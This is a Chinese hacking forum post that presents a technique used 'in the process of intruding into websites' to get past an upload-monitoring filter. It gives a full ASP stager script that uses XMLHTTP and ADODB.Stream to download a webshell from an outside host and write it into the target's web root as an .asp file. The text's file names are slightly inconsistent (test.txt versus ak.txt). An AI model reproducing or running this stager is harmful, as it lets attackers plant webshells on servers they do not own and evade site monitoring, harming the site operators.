| 在我们入侵网站的过程中,有时候提交我们的大马或者其它ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符。 既然它不允许我们进行提交,那我们可以采用下载的方法。这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标 文件下载到本地服务器中。好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件 <% Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.waitalone.cn/test.txt",False //代码在网上的地址 也就是大马 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile Server.MapPath("test.asp"),2 //在根目录生成的文件 set sGet = nothing set sPOST = nothing response.Write("下载文件成功!") %> 利用服务器的XML和数据流组件,从我的blog的ak.txt的内容下载到目标站点根目录并保存为ak.asp。 ak.txt中的内容当然就是被拦截的内容了。之后访问这个提交的ASP网页文件,会出现一片空白,然后我们再访问这个ak.asp文件,则想要上传的内容已经被保存成功! |
|小黑屋|最新主题|手机版|微赢网络技术论坛
( 苏ICP备08020429号 )
GMT+8, 2024-10-1 05:33 , Processed in 0.186759 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.
